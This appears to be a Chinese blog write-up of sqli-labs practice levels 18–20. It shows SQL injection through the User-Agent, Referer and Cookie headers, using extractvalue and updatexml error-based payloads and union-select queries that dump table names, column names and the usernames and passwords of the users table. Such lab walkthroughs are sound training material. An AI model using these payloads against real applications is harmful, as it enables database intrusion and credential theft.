sqli-lab————Writeup（18~20）各种头部注入

less18 基于错误的用户代理，头部POST注入

admin
admin
登入成功（进不去重置数据库）
显示如下

有user agent参数，可能存在注入点

显示版本号：

爆库：User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

库名：

less19基于头部的RefererPOST报错注入

抓包
admin登陆什么也没有
在referer后加单引号有回显sql语法错误
然后就和 18一样了：Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆库：

less20 基于错误的cookie头部POST注入

admin登陆：

本关登录成功后用户名会存储在cookie中,且通过该参数执行SQL语句

登录成功之后会设置里面的cookie 当二次刷新的时候 这时候会重新从里面取值弄，并且这次取值没有经过过滤 直接就是注入点 还是使用updatexml的函数进行报错

方法一：
cookie注入：uname=admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #

方法2：
cookie 后加单引号出现报错，说明cookie处存在注入点

'order by 3 --+ 	  // 回显正常
'order by 4 --+	      // 回显错误
                      //说明行数有3个，即3个显示位

爆库名：

之后就是爆表：

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

爆字段：

union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值：

union select 1,2,group_concat(username,0x3a,password) from users--+